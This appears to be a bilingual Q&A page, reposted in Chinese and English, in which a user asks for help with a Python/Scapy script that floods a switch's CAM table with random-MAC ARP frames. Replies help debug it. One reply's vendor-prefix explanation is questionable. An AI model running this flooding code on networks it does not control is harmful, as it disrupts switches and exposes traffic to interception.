python/scapy mac 泛洪脚本
我正在尝试用 python 制作一个小型的 mac 洪水工具来填充我的交换机凸轮表,但我无法让魔法发生?你能看到我做错了什么吗?
from scapy.all import *
while 1:
dest_mac = RandMAC()
src_mac = RandMAC()
sendp(Ether(src=src_mac, dst=dest_mac)/ARP(op=2, psrc="0.0.0.0", hwsrc=src_mac, hwdst=dest_mac)/Padding(load="X"*18), verbose=0)
虽然代码似乎运行良好,但它只是没有完成其工作。为了测试它,我使用wireshark查看数据包,然后运行THC的寄生虫“有效”,数据包几乎相同,所以我不确定发生了什么。感谢您的帮助。
I'm trying to make a small mac flood tool in python to fill my switches cam tables but i cant make the magic happen? can you see what im doing wrong?
from scapy.all import *
while 1:
dest_mac = RandMAC()
src_mac = RandMAC()
sendp(Ether(src=src_mac, dst=dest_mac)/ARP(op=2, psrc="0.0.0.0", hwsrc=src_mac, hwdst=dest_mac)/Padding(load="X"*18), verbose=0)
while the code seems to run fine it just dont do its job. to test it i used wireshark to look at the packets then ran THC's parasite "which works" and the packets are almost the same so im not sure what is going on. Thank you for any help.
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(2)
只能使用某些 mac 地址:一个 mac 地址由六组两个十六进制数字组成,用连字符 (-) 或冒号 (:) 分隔。前三个字段必须填写一些值,每个供应商的值都不同。如果此字段未设置任何供应商代码,服务器(或客户端)将丢弃数据包。您可以在wireshark manuf 文件上找到mac 供应商列表,或者直接使用google 查找。您可以通过在终端中输入“sudo ifcofig IFACE ether hw ADDRESS”来检查地址。
You can only use some mac address: a mac address is composed by six groups of two hexadecimal digits, separated by hyphens (-) or colons (:). The first three fields must be filled with some values, different for every vendor. If this fields are not set with any vendor code the server (or the client) will drop the packet. You can find mac vendors list on wireshark manuf file, or simply looking for it with google. You can check the address by typing "sudo ifcofig IFACE ether hw ADDRESS" in the terminal.
Emada、
Mac 地址是交换机仅使用源地址来学习的,因此无需担心目的地随机化。
我已经对此进行了测试,它似乎工作得很好..您可能还想尝试使用 sendpfast 选项进行泛洪,但是在我在这里的测试中,sendp 似乎工作得更快?
Emada,
Mac addresses are learned by switches by using the source address only so no need to worry about destination randomizing.
I have tested this and it seems to work well..you might also want to try the sendpfast option for flooding, however in my testing here sendp seemed to work faster?